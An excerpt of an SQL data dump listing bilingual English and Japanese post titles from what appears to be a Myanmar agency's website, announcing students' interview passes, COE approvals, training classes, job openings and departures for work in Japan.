(103, 505, 'ja', 1, 1, 'Congratulations For Getting COE ', 1719394270, 1719394403, 0, 0, 0, 1, 'en', 0),
(105, 506, 'en', 1, 1, 'Congratulations For Getting COE ', 1719394561, 1719394775, 0, 0, 1, 1, 'und', 0),
(105, 507, 'en', 1, 1, 'Congratulations For Getting COE ', 1719394561, 1719394775, 0, 0, 1, NULL, 'und', 0),
(105, 507, 'ja', 1, 1, 'Congratulations For Getting COE ', 1719394779, 1719394942, 0, 0, 0, 1, 'en', 0),
(106, 508, 'en', 1, 1, 'Congrats KHAING THAW THAW KHANT!', 1719394537, 1719395347, 0, 0, 1, 1, 'und', 0),
(106, 509, 'en', 1, 1, 'Congrats KHAING THAW THAW KHANT!', 1719394537, 1719395347, 0, 0, 1, NULL, 'und', 0),
(106, 509, 'ja', 1, 1, 'Congrats KHAING THAW THAW KHANT!', 1719395358, 1719395406, 0, 0, 0, 1, 'en', 0),
(107, 510, 'en', 1, 1, 'Congratulations PYAE SONE THU!', 1719395641, 1719395840, 0, 0, 1, 1, 'und', 0),
(107, 511, 'en', 1, 1, 'Congratulations PYAE SONE THU!', 1719395641, 1719395840, 0, 0, 1, NULL, 'und', 0),
(107, 511, 'ja', 1, 1, 'Congratulations PYAE SONE THU!', 1719395851, 1719395931, 0, 0, 0, 1, 'en', 0),
(108, 512, 'en', 1, 1, 'Congratulations For Getting COE ', 1719395828, 1719396059, 0, 0, 1, 1, 'und', 0),
(108, 513, 'en', 1, 1, 'Congratulations For Getting COE ', 1719395828, 1719396059, 0, 0, 1, NULL, 'und', 0),
(108, 513, 'ja', 1, 1, 'Congratulations For Getting COE ', 1719396064, 1719396095, 0, 0, 0, 1, 'en', 0),
(109, 514, 'en', 1, 1, 'Congrats CHAN MYAE THU!', 1719396063, 1719396241, 0, 0, 1, 1, 'und', 0),
(109, 515, 'en', 1, 1, 'Congrats CHAN MYAE THU!', 1719396063, 1719396241, 0, 0, 1, NULL, 'und', 0),
(109, 515, 'ja', 1, 1, 'Congrats CHAN MYAE THU!', 1719396247, 1719396373, 0, 0, 0, 1, 'en', 0),
(110, 516, 'en', 1, 1, 'Congratulations YAW CHANG!', 1719396466, 1719396713, 0, 0, 1, 1, 'und', 0),
(110, 517, 'en', 1, 1, 'Congratulations YAW CHANG!', 1719396466, 1719396713, 0, 0, 1, NULL, 'und', 0),
(110, 517, 'ja', 1, 1, 'Congratulations YAW CHANG!', 1719396725, 1719396790, 0, 0, 0, 1, 'en', 0),
(111, 518, 'en', 1, 1, 'Congratulations(19-5-2024)', 1719396487, 1719397202, 0, 0, 1, 1, 'und', 0),
(111, 519, 'en', 1, 1, 'Congratulations(19-5-2024)', 1719396487, 1719397202, 0, 0, 1, NULL, 'und', 0),
(111, 519, 'ja', 1, 1, 'Congratulations(19-5-2024)', 1719397209, 1719397256, 0, 0, 0, 1, 'en', 0),
(112, 520, 'en', 1, 1, 'Congrats ADIN MIN MAW & MIN KHANT KYAW', 1719397443, 1719397446, 0, 0, 1, 1, 'und', 0),
(112, 521, 'en', 1, 1, 'Congrats ADIN MIN MAW & MIN KHANT KYAW', 1719397443, 1719397446, 0, 0, 1, 1, 'und', 0),
(112, 521, 'ja', 1, 1, 'Congrats ADIN MIN MAW & MIN KHANT KYAW', 1719397455, 1719397518, 0, 0, 0, 1, 'en', 0),
(113, 522, 'en', 1, 1, 'Congratulations(29-5-2024)', 1719397375, 1719397758, 0, 0, 1, 1, 'und', 0),
(113, 523, 'en', 1, 1, 'Congratulations(29-5-2024)', 1719397375, 1719397758, 0, 0, 1, NULL, 'und', 0),
(113, 523, 'ja', 1, 1, 'Congratulations(29-5-2024)', 1719397763, 1719397829, 0, 0, 0, 1, 'en', 0),
(95, 524, 'en', 1, 1, 'ACTIVITIES FOR 3TH BATCH OF ON-JOB TRAINING(RESTAURANT) ', 1719313690, 1719398112, 0, 0, 1, 1, 'und', 0),
(95, 524, 'ja', 1, 1, 'ACTIVITIES FOR 2ND BATCH OF ON-JOB TRAINING(RESTAURANT) ', 1719315595, 1719315692, 0, 0, 0, NULL, 'en', 0),
(114, 525, 'en', 1, 1, 'Congrats YU MON AUNG & MAY MYO KHAING', 1719397588, 1719398127, 0, 0, 1, 1, 'und', 0),
(114, 526, 'en', 1, 1, 'Congrats YU MON AUNG & MAY MYO KHAING', 1719397588, 1719398127, 0, 0, 1, NULL, 'und', 0),
(114, 526, 'ja', 1, 1, 'Congrats YU MON AUNG & MAY MYO KHAING', 1719398132, 1719398189, 0, 0, 0, 1, 'en', 0),
(115, 527, 'en', 1, 1, 'Congrats LI SOUNG OO, THANDAR MOE, KHU RICHARD, PYAE SONE AUNG', 1719398517, 1719398759, 0, 0, 1, 1, 'und', 0),
(115, 528, 'en', 1, 1, 'Congrats LI SOUNG OO, THANDAR MOE, KHU RICHARD, PYAE SONE AUNG', 1719398517, 1719398759, 0, 0, 1, NULL, 'und', 0),
(115, 528, 'ja', 1, 1, 'Congrats LI SOUNG OO, THANDAR MOE, KHU RICHARD, PYAE SONE AUNG', 1719398770, 1719398849, 0, 0, 0, 1, 'en', 0),
(116, 529, 'en', 1, 1, 'Images of 2th batch Resturtant Internship ', 1719398601, 1719399020, 0, 0, 1, 1, 'und', 0),
(117, 530, 'en', 1, 1, 'Congrats EI EAINDRA AUNG !', 1719398961, 1719399089, 0, 0, 1, 1, 'und', 0),
(116, 531, 'en', 1, 1, 'Images of 2th batch Resturtant Internship ', 1719398601, 1719399020, 0, 0, 1, NULL, 'und', 0),
(116, 531, 'ja', 1, 1, 'Images of 2th batch Resturtant Internship ', 1719399024, 1719399098, 0, 0, 0, 1, 'en', 0),
(117, 532, 'en', 1, 1, 'Congrats EI EAINDRA AUNG !', 1719398961, 1719399089, 0, 0, 1, NULL, 'und', 0),
(117, 532, 'ja', 1, 1, 'Congrats EI EAINDRA AUNG !', 1719399098, 1719399137, 0, 0, 0, 1, 'en', 0),
(118, 533, 'en', 1, 1, 'Congrats AUNG THURA', 1719399178, 1719399288, 0, 0, 1, 1, 'und', 0),
(118, 534, 'en', 1, 1, 'Congrats AUNG THURA', 1719399178, 1719399288, 0, 0, 1, NULL, 'und', 0),
(118, 534, 'ja', 1, 1, 'Congrats AUNG THURA', 1719399295, 1719399332, 0, 0, 0, 1, 'en', 0),
(119, 535, 'ja', 1, 1, 'Congrats THATOE AUNG', 1719399386, 1719399522, 0, 0, 1, 1, 'und', 0),
(119, 536, 'en', 1, 1, 'Congrats THATOE AUNG', 1719399386, 1719399541, 0, 0, 1, 1, 'und', 0),
(119, 537, 'en', 1, 1, 'Congrats THATOE AUNG', 1719399386, 1719399541, 0, 0, 1, NULL, 'und', 0),
(119, 537, 'ja', 1, 1, 'Congrats THATOE AUNG', 1719399547, 1719399593, 0, 0, 0, 1, 'en', 0),
(120, 538, 'en', 1, 1, 'Boss\'s Treatment to celebrate for the interview passed student', 1719399194, 1719399673, 0, 0, 1, 1, 'und', 0),
(120, 539, 'en', 1, 1, 'Boss\'s Treatment to celebrate for the interview passed student', 1719399194, 1719399673, 0, 0, 1, NULL, 'und', 0),
(120, 539, 'ja', 1, 1, 'Boss\'s Treatment to celebrate for the interview passed student', 1719399678, 1719399772, 0, 0, 0, 1, 'en', 0),
(121, 540, 'en', 1, 1, 'Congrats YEE YEE THANT & NAY LIN AUNG ', 1719399666, 1719399822, 0, 0, 1, 1, 'und', 0),
(121, 541, 'en', 1, 1, 'Congrats YEE YEE THANT & NAY LIN AUNG ', 1719399666, 1719399822, 0, 0, 1, NULL, 'und', 0),
(121, 541, 'ja', 1, 1, 'Congrats YEE YEE THANT & NAY LIN AUNG ', 1719399831, 1719399874, 0, 0, 0, 1, 'en', 0),
(122, 542, 'en', 1, 1, '1th Batch Internship in Sushi Resturtant (21-2-2024)', 1719399808, 1719400071, 0, 0, 1, 1, 'und', 0),
(123, 543, 'en', 1, 1, 'Congrats KHIN YU MON PHYO & THAE EI PHYU ', 1719399955, 1719400104, 0, 0, 1, 1, 'und', 0),
(122, 544, 'en', 1, 1, '1th Batch Internship in Sushi Resturtant (21-2-2024)', 1719399808, 1719400071, 0, 0, 1, NULL, 'und', 0),
(122, 544, 'ja', 1, 1, '1th Batch Internship in Sushi Resturtant (21-2-2024)', 1719400078, 1719400141, 0, 0, 0, 1, 'en', 0),
(123, 545, 'en', 1, 1, 'Congrats KHIN YU MON PHYO & THAE EI PHYU ', 1719399955, 1719400104, 0, 0, 1, NULL, 'und', 0),
(123, 545, 'ja', 1, 1, 'Congrats KHIN YU MON PHYO & THAE EI PHYU ', 1719400111, 1719400152, 0, 0, 0, 1, 'en', 0),
(124, 546, 'en', 1, 1, 'Congrats THURA KYAW', 1719400210, 1719400494, 0, 0, 1, 1, 'und', 0),
(124, 547, 'en', 1, 1, 'Congrats THURA KYAW', 1719400210, 1719400494, 0, 0, 1, NULL, 'und', 0),
(124, 547, 'ja', 1, 1, 'Congrats THURA KYAW', 1719400500, 1719400540, 0, 0, 0, 1, 'en', 0),
(125, 548, 'en', 1, 1, 'Congrats MAY THINGYAN HTUN & NAW NAY DAR PALU ', 1719400587, 1719400764, 0, 0, 1, 1, 'und', 0),
(125, 549, 'en', 1, 1, 'Congrats MAY THINGYAN HTUN & NAW NAY DAR PALU ', 1719400587, 1719400764, 0, 0, 1, NULL, 'und', 0),
(125, 549, 'ja', 1, 1, 'Congrats MAY THINGYAN HTUN & NAW NAY DAR PALU ', 1719400775, 1719400826, 0, 0, 0, 1, 'en', 0),
(126, 550, 'en', 1, 1, 'Arrival At Japan(10-4-2024)', 1719400696, 1719400850, 0, 0, 1, 1, 'und', 0),
(126, 551, 'en', 1, 1, 'Arrival At Japan(10-4-2024)', 1719400696, 1719400850, 0, 0, 1, NULL, 'und', 0),
(126, 551, 'ja', 1, 1, 'Arrival At Japan(10-4-2024)', 1719400855, 1719400888, 0, 0, 0, 1, 'en', 0),
(127, 552, 'en', 1, 1, 'Congrats YU WAI PHYO, SOE SANDAR HTWE, PANN EI ZAW', 1719400915, 1719401072, 0, 0, 1, 1, 'und', 0),
(127, 553, 'en', 1, 1, 'Congrats YU WAI PHYO, SOE SANDAR HTWE, PANN EI ZAW', 1719400915, 1719401072, 0, 0, 1, NULL, 'und', 0),
(127, 553, 'ja', 1, 1, 'Congrats YU WAI PHYO, SOE SANDAR HTWE, PANN EI ZAW', 1719401079, 1719401205, 0, 0, 0, 1, 'en', 0),
(128, 554, 'en', 1, 1, 'Congrats for NAN THAE NU SOE, EI EI MIN, HLAING MEE MEE HTIKE, PYAE SU SU SAN', 1719401448, 1719401644, 0, 0, 1, 1, 'und', 0),
(128, 555, 'en', 1, 1, 'Congrats for NAN THAE NU SOE, EI EI MIN, HLAING MEE MEE HTIKE, PYAE SU SU SAN', 1719401448, 1719401644, 0, 0, 1, NULL, 'und', 0),
(128, 555, 'ja', 1, 1, 'Congrats for NAN THAE NU SOE, EI EI MIN, HLAING MEE MEE HTIKE, PYAE SU SU SAN', 1719401652, 1719401682, 0, 0, 0, 1, 'en', 0),
(129, 556, 'en', 1, 1, 'Congrats KAY THARI TOE, MAY HLA MYO, NILA AUNG', 1719401822, 1719401937, 0, 0, 1, 1, 'und', 0),
(129, 557, 'en', 1, 1, 'Congrats KAY THARI TOE, MAY HLA MYO, NILA AUNG', 1719401822, 1719401937, 0, 0, 1, NULL, 'und', 0),
(129, 557, 'ja', 1, 1, 'Congrats KAY THARI TOE, MAY HLA MYO, NILA AUNG', 1719401943, 1719401970, 0, 0, 0, 1, 'en', 0),
(130, 558, 'en', 1, 1, 'Congrats ', 1719402186, 1719402459, 0, 0, 1, 1, 'und', 0),
(130, 559, 'en', 1, 1, 'Congrats ', 1719402186, 1719402459, 0, 0, 1, NULL, 'und', 0),
(130, 559, 'ja', 1, 1, 'Congrats ', 1719402466, 1719402486, 0, 0, 0, 1, 'en', 0),
(131, 560, 'en', 1, 1, 'Congrats to KYAW ZIN LATT', 1719402495, 1719402599, 0, 0, 1, 1, 'und', 0),
(131, 561, 'en', 1, 1, 'Congrats to KYAW ZIN LATT', 1719402495, 1719402599, 0, 0, 1, NULL, 'und', 0),
(131, 561, 'ja', 1, 1, 'Congrats to KYAW ZIN LATT', 1719402604, 1719402630, 0, 0, 0, 1, 'en', 0),
(132, 562, 'en', 1, 1, 'Congratulations YIN MAY THU & YAMIN SHWE ZIN ', 1719474946, 1719478348, 0, 0, 1, 1, 'und', 0),
(132, 563, 'en', 1, 1, 'Congratulations YIN MAY THU & YAMIN SHWE ZIN ', 1719474946, 1719478348, 0, 0, 1, NULL, 'und', 0),
(132, 563, 'ja', 1, 1, 'Congratulations YIN MAY THU & YAMIN SHWE ZIN ', 1719478395, 1719478496, 0, 0, 0, 1, 'en', 0),
(133, 564, 'en', 1, 1, '2nd Batch Pratical class completion', 1719478628, 1719478939, 0, 0, 1, 1, 'und', 0),
(133, 565, 'en', 1, 1, '2nd Batch Pratical class completion', 1719478628, 1719478939, 0, 0, 1, NULL, 'und', 0),
(133, 565, 'ja', 1, 1, '2nd Batch Pratical class completion', 1719478947, 1719479062, 0, 0, 0, 1, 'en', 0),
(134, 566, 'en', 1, 1, 'Congratulations to 7 peson for Passing Interview! ', 1719478627, 1719479159, 0, 0, 1, 1, 'und', 0),
(134, 567, 'en', 1, 1, 'Congratulations to 7 peson for Passing Interview! ', 1719478627, 1719479159, 0, 0, 1, NULL, 'und', 0),
(134, 567, 'ja', 1, 1, 'Congratulations to 7 peson for Passing Interview! ', 1719479170, 1719479280, 0, 0, 0, 1, 'en', 0),
(135, 568, 'en', 1, 1, 'Purpose Of Pratical Training', 1719479321, 1719479477, 0, 0, 1, 1, 'und', 0),
(135, 569, 'en', 1, 1, 'Purpose Of Pratical Training', 1719479321, 1719479477, 0, 0, 1, NULL, 'und', 0),
(135, 569, 'ja', 1, 1, 'Purpose Of Pratical Training', 1719479487, 1719479538, 0, 0, 0, 1, 'en', 0),
(136, 570, 'en', 1, 1, 'Pratical Nursing Class', 1719479659, 1719479945, 0, 0, 1, 1, 'und', 0),
(136, 571, 'en', 1, 1, 'Pratical Nursing Class', 1719479659, 1719479945, 0, 0, 1, NULL, 'und', 0),
(136, 571, 'ja', 1, 1, 'Pratical Nursing Class', 1719479949, 1719479981, 0, 0, 0, 1, 'en', 0),
(137, 572, 'en', 1, 1, 'Congratulations to NANG BWAR KYI, PHRAY MYAR, KAW MYAR!', 1719479609, 1719480092, 0, 0, 1, 1, 'und', 0),
(137, 573, 'en', 1, 1, 'Congratulations to NANG BWAR KYI, PHRAY MYAR, KAW MYAR!', 1719479609, 1719480092, 0, 0, 1, NULL, 'und', 0),
(137, 573, 'ja', 1, 1, 'Congratulations to NANG BWAR KYI, PHRAY MYAR, KAW MYAR!', 1719480118, 1719480194, 0, 0, 0, 1, 'en', 0),
(138, 574, 'en', 1, 1, '1st Batch Speaking and Pratical Class Completion', 1719480211, 1719480344, 0, 0, 1, 1, 'und', 0),
(138, 575, 'en', 1, 1, '1st Batch Speaking and Pratical Class Completion', 1719480211, 1719480344, 0, 0, 1, NULL, 'und', 0),
(138, 575, 'ja', 1, 1, '1st Batch Speaking and Pratical Class Completion', 1719480351, 1719480376, 0, 0, 0, 1, 'en', 0),
(139, 576, 'en', 1, 1, 'Congratulations HNIN WAH KHAING, LAY LAY NAING!', 1719480203, 1719480485, 0, 0, 1, 1, 'und', 0),
(139, 577, 'en', 1, 1, 'Congratulations HNIN WAH KHAING, LAY LAY NAING!', 1719480203, 1719480485, 0, 0, 1, NULL, 'und', 0),
(139, 577, 'ja', 1, 1, 'Congratulations HNIN WAH KHAING, LAY LAY NAING!', 1719480491, 1719480567, 0, 0, 0, 1, 'en', 0),
(140, 578, 'en', 1, 1, '1st Batch Theoretical Class For 15 Students', 1719480590, 1719481095, 0, 0, 1, 1, 'und', 0),
(140, 579, 'en', 1, 1, '1st Batch Theoretical Class For 15 Students', 1719480590, 1719481095, 0, 0, 1, NULL, 'und', 0),
(140, 579, 'ja', 1, 1, '1st Batch Theoretical Class For 15 Students', 1719481103, 1719481142, 0, 0, 0, 1, 'en', 0),
(141, 580, 'en', 1, 1, 'Congrats EI EI NYEIN , THU ZAR AUNG, BUE MYAR SHAR! ', 1719481335, 1719481555, 0, 0, 1, 1, 'und', 0),
(141, 581, 'en', 1, 1, 'Congrats EI EI NYEIN , THU ZAR AUNG, BUE MYAR SHAR! ', 1719481335, 1719481555, 0, 0, 1, NULL, 'und', 0),
(141, 581, 'ja', 1, 1, 'Congrats EI EI NYEIN , THU ZAR AUNG, BUE MYAR SHAR! ', 1719481567, 1719481622, 0, 0, 0, 1, 'en', 0),
(142, 582, 'en', 1, 1, 'Commencement Of New Comet Language Centre', 1719481576, 1719481973, 0, 0, 1, 1, 'und', 0),
(142, 583, 'en', 1, 1, 'Commencement Of New Comet Language Centre', 1719481576, 1719481973, 0, 0, 1, NULL, 'und', 0),
(142, 583, 'ja', 1, 1, 'Commencement Of New Comet Language Centre', 1719481977, 1719482002, 0, 0, 0, 1, 'en', 0),
(143, 584, 'en', 1, 1, 'Congratulations HNIN WAI WAI NWE & THIDA KHINE! ', 1719481672, 1719482114, 0, 0, 1, 1, 'und', 0),
(143, 585, 'en', 1, 1, 'Congratulations HNIN WAI WAI NWE & THIDA KHINE! ', 1719481672, 1719482114, 0, 0, 1, NULL, 'und', 0),
(143, 585, 'ja', 1, 1, 'Congratulations HNIN WAI WAI NWE & THIDA KHINE! ', 1719482126, 1719482168, 0, 0, 0, 1, 'en', 0),
(144, 586, 'en', 1, 1, 'Congratulations to AUNG ZIN OO, HTET WAI AUNG, THAN HTUN NAING! ', 1719482182, 1719482748, 0, 0, 1, 1, 'und', 0),
(144, 587, 'en', 1, 1, 'Congratulations to AUNG ZIN OO, HTET WAI AUNG, THAN HTUN NAING! ', 1719482182, 1719482748, 0, 0, 1, 1, 'und', 0),
(144, 587, 'ja', 1, 1, 'Congratulations to AUNG ZIN OO, HTET WAI AUNG, THAN HTUN NAING! ', 1719482757, 1719482843, 0, 0, 0, 1, 'en', 0),
(145, 588, 'en', 1, 1, 'Congratulations For Getting COE ', 1719568709, 1719568930, 0, 0, 1, 1, 'und', 0),
(145, 589, 'en', 1, 1, 'Congratulations For Getting COE ', 1719568709, 1719568930, 0, 0, 1, NULL, 'und', 0),
(145, 589, 'ja', 1, 1, 'Congratulations For Getting COE ', 1719568936, 1719568967, 0, 0, 0, 1, 'en', 0),
(146, 590, 'en', 1, 1, 'Congratulations For Passing the Interview', 1719571392, 1719571760, 0, 0, 1, 1, 'und', 0),
(146, 591, 'en', 1, 1, 'Congratulations For Passing the Interview', 1719571392, 1719571760, 0, 0, 1, NULL, 'und', 0),
(146, 591, 'ja', 1, 1, 'Congratulations For Passing the Interview', 1719571765, 1719571826, 0, 0, 0, 1, 'en', 0),
(146, 592, 'en', 1, 1, 'Congratulations For Passing the Interview', 1719571392, 1719571929, 0, 0, 1, 1, 'und', 0),
(146, 592, 'ja', 1, 1, 'Congratulations For Passing the Interview', 1719571765, 1719571826, 0, 0, 0, NULL, 'en', 0),
(146, 593, 'en', 1, 1, 'Congratulations THET HTAR MYINT KO & HSU MYAT HMUE & HNIN YU HLAING & WAI WAI KHAING & CHAW HSU THWE For Passing the Interview', 1719571392, 1719572063, 0, 0, 1, 1, 'und', 0),
(146, 593, 'ja', 1, 1, 'Congratulations For Passing the Interview', 1719571765, 1719571826, 0, 0, 0, NULL, 'en', 0),
(147, 594, 'en', 1, 1, 'Congratulations KYAW ZIN LATT for getting COE! ', 1719634558, 1719635012, 0, 0, 1, 1, 'und', 0),
(147, 595, 'en', 1, 1, 'Congratulations KYAW ZIN LATT for getting COE! ', 1719634558, 1719635012, 0, 0, 1, NULL, 'und', 0),
(147, 595, 'ja', 1, 1, 'Congratulations KYAW ZIN LATT for getting COE! ', 1719635048, 1719635105, 0, 0, 0, 1, 'en', 0),
(148, 596, 'en', 1, 1, 'Congratulations For Getting COE  ', 1719906495, 1719906578, 0, 0, 1, 1, 'und', 0),
(148, 597, 'en', 1, 1, 'Congratulations For Getting COE  ', 1719906495, 1719906578, 0, 0, 1, NULL, 'und', 0),
(148, 597, 'ja', 1, 1, 'Congratulations For Getting COE  ', 1719906585, 1719906615, 0, 0, 0, 1, 'en', 0),
(149, 598, 'en', 1, 1, 'Congratulations For Passing the Interview', 1720081211, 1720081343, 0, 0, 1, 1, 'und', 0),
(150, 599, 'en', 1, 1, 'Training about CPR(Kaigo)', 1720081551, 1720082602, 0, 0, 1, 1, 'und', 0),
(150, 600, 'en', 1, 1, 'Training about CPR(Kaigo)', 1720081551, 1720082602, 0, 0, 1, NULL, 'und', 0),
(150, 600, 'ja', 1, 1, 'Training about CPR(Kaigo)', 1720082607, 1720082636, 0, 0, 0, 1, 'en', 0),
(151, 601, 'en', 1, 1, 'Congratulations For Getting COE ', 1720082881, 1720082985, 0, 0, 1, 1, 'und', 0),
(151, 602, 'en', 1, 1, 'Congratulations For Getting COE ', 1720082881, 1720082985, 0, 0, 1, NULL, 'und', 0),
(151, 602, 'ja', 1, 1, 'Congratulations For Getting COE ', 1720082990, 1720083010, 0, 0, 0, 1, 'en', 0),
(152, 603, 'en', 1, 1, 'Congratulation For Getting COE', 1720244796, 1720246640, 0, 0, 1, 1, 'und', 0),
(152, 604, 'en', 1, 1, 'Congratulation For Getting COE', 1720244796, 1720246640, 0, 0, 1, NULL, 'und', 0),
(152, 604, 'ja', 1, 1, 'Congratulation For Getting COE', 1720246670, 1720246679, 0, 0, 0, 1, 'en', 0),
(153, 605, 'en', 1, 1, 'Congratulations For Getting COE ', 1720437398, 1720437572, 0, 0, 1, 1, 'und', 0),
(153, 606, 'en', 1, 1, 'Congratulations For Getting COE ', 1720437398, 1720437572, 0, 0, 1, NULL, 'und', 0),
(153, 606, 'ja', 1, 1, 'Congratulations For Getting COE ', 1720437602, 1720437640, 0, 0, 0, 1, 'en', 0),
(154, 607, 'en', 1, 1, 'Five Caregiver Workers Departed for Japan under the Specified Skilled Worker (Kaigo) Program', 1781849049, 1781849669, 0, 0, 1, 1, 'und', 0),
(154, 608, 'en', 1, 1, 'Five Caregiver Workers Departed for Japan under the Specified Skilled Worker (Kaigo) Program', 1781849049, 1781849669, 0, 0, 1, NULL, 'und', 0),
(154, 608, 'ja', 1, 1, '特定技能（介護）人材5名 日本出発のお知らせ', 1781849684, 1781849924, 0, 0, 0, 1, 'en', 0),
(154, 609, 'en', 1, 1, 'Five Caregiver Workers Departed for Japan under the Specified Skilled Worker (Kaigo) Program', 1781849049, 1781849669, 0, 0, 1, NULL, 'und', 0),
(154, 609, 'ja', 1, 1, '特定技能（介護）人材5名 日本出発のお知らせ', 1781849684, 1781850087, 0, 0, 0, 1, 'en', 0),
(155, 610, 'en', 1, 1, 'New Hotel Tokutei Preparation Class Now Open', 1781850513, 1781850827, 0, 0, 1, 1, 'und', 0),
(155, 611, 'en', 1, 1, 'New Hotel Tokutei Preparation Class Now Open', 1781850513, 1781850827, 0, 0, 1, NULL, 'und', 0),
(155, 611, 'ja', 1, 1, 'ホテル分野 特定技能試験対策クラス開講のお知らせ', 1781852401, 1781853362, 0, 0, 0, 1, 'en', 0),
(156, 612, 'en', 1, 1, 'Departure to Japan: Specified Skilled Worker (Food Service Industry)', 1781853965, 1781854366, 0, 0, 1, 1, 'und', 0),
(156, 613, 'en', 1, 1, 'Departure to Japan: Specified Skilled Worker (Food Service Industry)', 1781853965, 1781854366, 0, 0, 1, NULL, 'und', 0),
(156, 613, 'ja', 1, 1, '出国報告】特定技能（外食業）で日本へ出発しました', 1781854374, 1781854408, 0, 0, 0, 1, 'en', 0),
(157, 614, 'ja', 1, 1, '出国報告】特定技能（外食業）で9名が日本へ出発しました', 1781854149, 1781854808, 0, 0, 1, 1, 'und', 0),
(157, 615, 'en', 1, 1, 'Group Departure to Japan: Specified Skilled Worker (Food Service Industry)', 1781854816, 1781854858, 0, 0, 0, 1, 'ja', 0),
(157, 615, 'ja', 1, 1, '出国報告】特定技能（外食業）で9名が日本へ出発しました', 1781854149, 1781854808, 0, 0, 1, NULL, 'und', 0),
(160, 620, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857702, 1781857812, 0, 0, 1, 1, 'und', 0),
(160, 621, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857702, 1781857812, 0, 0, 1, NULL, 'und', 0),
(160, 621, 'ja', 1, 1, '特定技能（外食業）面接合格のご報告', 1781857818, 1781857849, 0, 0, 0, 1, 'en', 0),
(161, 622, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781857871, 1781857975, 0, 0, 1, 1, 'und', 0),
(161, 623, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857982, 1781858020, 0, 0, 0, 1, 'ja', 0),
(161, 623, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781857871, 1781857975, 0, 0, 1, NULL, 'und', 0),
(162, 624, 'en', 1, 1, 'Home Care Caregiver Position Available in Aichi, Japan', 1781859433, 1781859579, 0, 0, 1, 1, 'und', 0),
(162, 625, 'en', 1, 1, 'Home Care Caregiver Position Available in Aichi, Japan', 1781859433, 1781859579, 0, 0, 1, NULL, 'und', 0),
(162, 625, 'ja', 1, 1, '愛知県 訪問介護スタッフ募集（特定技能・介護）', 1781859590, 1781859626, 0, 0, 0, 1, 'en', 0),
(163, 626, 'en', 1, 1, 'Agriculture Workers Wanted for Tokutei Program in Japan', 1781859859, 1781860124, 0, 0, 1, 1, 'und', 0),
(163, 627, 'en', 1, 1, 'Agriculture Workers Wanted for Tokutei Program in Japan', 1781859859, 1781860124, 0, 0, 1, NULL, 'und', 0),
(163, 627, 'ja', 1, 1, '特定技能（農業）スタッフ募集（茨城県つくば市）', 1781860135, 1781860170, 0, 0, 0, 1, 'en', 0),
(164, 628, 'en', 1, 1, 'Hotel Worker Begins Career Journey in Japan', 1781860536, 1781861026, 0, 0, 1, 1, 'und', 0),
(164, 629, 'en', 1, 1, 'Hotel Worker Begins Career Journey in Japan', 1781860536, 1781861026, 0, 0, 1, NULL, 'und', 0),
(164, 629, 'ja', 1, 1, '特定技能（宿泊）人材 日本出発のお知らせ', 1781861033, 1781861065, 0, 0, 0, 1, 'en', 0),
(165, 630, 'en', 1, 1, 'Four Caregiver Workers Departed for Japan', 1781861195, 1781861523, 0, 0, 1, 1, 'und', 0),
(165, 631, 'en', 1, 1, 'Four Caregiver Workers Departed for Japan', 1781861195, 1781861523, 0, 0, 1, NULL, 'und', 0),
(165, 631, 'ja', 1, 1, '特定技能（介護）人材4名 日本出発のお知らせ', 1781861533, 1781861571, 0, 0, 0, 1, 'en', 0),
(166, 632, 'ja', 1, 1, 'Candidate Successfully Passed Tokutei Hotel Interview', 1781861811, 1781861886, 0, 0, 1, 1, 'und', 0),
(166, 633, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Hotel Interview', 1781861811, 1781861912, 0, 0, 1, 1, 'und', 0),
(166, 634, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Hotel Interview', 1781861811, 1781861912, 0, 0, 1, NULL, 'und', 0),
(166, 634, 'ja', 1, 1, '特定技能（宿泊）面接合格のお知らせ', 1781861919, 1781861949, 0, 0, 0, 1, 'en', 0),
(167, 635, 'en', 1, 1, 'Four Food Service Workers Departed for Japan', 1781862000, 1781862136, 0, 0, 1, 1, 'und', 0),
(167, 636, 'en', 1, 1, 'Four Food Service Workers Departed for Japan', 1781862000, 1781862136, 0, 0, 1, NULL, 'und', 0),
(167, 636, 'ja', 1, 1, '特定技能（外食業）人材4名 日本出発のお知らせ', 1781862148, 1781862182, 0, 0, 0, 1, 'en', 0),
(168, 637, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Hotel Interview', 1781862296, 1781862436, 0, 0, 1, 1, 'und', 0),
(168, 638, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Hotel Interview', 1781862296, 1781862436, 0, 0, 1, NULL, 'und', 0),
(168, 638, 'ja', 1, 1, '特定技能（宿泊）面接合格のお知らせ', 1781862442, 1781862475, 0, 0, 0, 1, 'en', 0),
(169, 639, 'en', 1, 1, 'Three Caregiver Workers Departed for Japan', 1781862612, 1781862777, 0, 0, 1, 1, 'und', 0),
(169, 640, 'en', 1, 1, 'Three Caregiver Workers Departed for Japan', 1781862612, 1781862777, 0, 0, 1, NULL, 'und', 0),
(169, 640, 'ja', 1, 1, '特定技能（介護）人材3名 日本出発のお知らせ', 1781862788, 1781862822, 0, 0, 0, 1, 'en', 0),
(170, 641, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Kaigo Interview', 1781862997, 1781864070, 0, 0, 1, 1, 'und', 0),
(170, 642, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Kaigo Interview', 1781862997, 1781864070, 0, 0, 1, NULL, 'und', 0),
(170, 642, 'ja', 1, 1, '特定技能（介護）面接合格のお知らせ', 1781864135, 1781864161, 0, 0, 0, 1, 'en', 0),
(171, 643, 'en', 1, 1, 'Caregiver Begins New Career Journey in Japan', 1781864280, 1781864827, 0, 0, 1, 1, 'und', 0),
(171, 644, 'en', 1, 1, 'Caregiver Begins New Career Journey in Japan', 1781864280, 1781864827, 0, 0, 1, NULL, 'und', 0),
(171, 644, 'ja', 1, 1, '特定技能（介護）人材 日本出発のお知らせ', 1781864833, 1781864863, 0, 0, 0, 1, 'en', 0),
(173, 647, 'en', 1, 1, 'Nine Food Service Workers Begin Their New Careers in Japan', 1781865504, 1781865730, 0, 0, 1, 1, 'und', 0),
(173, 648, 'en', 1, 1, 'Nine Food Service Workers Begin Their New Careers in Japan', 1781865504, 1781865730, 0, 0, 1, NULL, 'und', 0),
